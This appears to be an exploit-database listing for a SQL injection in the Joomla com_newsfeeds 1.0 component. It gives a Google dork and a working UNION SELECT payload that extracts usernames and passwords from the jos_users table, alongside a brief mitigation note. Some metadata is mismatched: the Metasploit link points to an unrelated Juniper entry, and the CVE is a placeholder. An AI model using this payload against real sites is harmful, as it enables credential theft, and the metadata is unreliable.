header-logo
Suggest Exploit
vendor:
Joomla
by:
Milad Karimi
9.0
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2020-XXXX
CPE: a:joomla:joomla:1.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/juniper-junos-os-jsa11059/
Other Scripts: N/A
Platforms Tested: Windows 10, Firefox
2020

Joomla! Component com_newsfeeds 1.0 – ‘feedid’ SQL Injection

The vulnerability exists due to insufficient filtration of user-supplied input passed via the 'feedid' parameter to the '/index.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent malicious SQL statements from being executed.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
# Date: 2020-03-10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds


index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Example:

http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

Navigation

Suggest Exploit

Services By CQR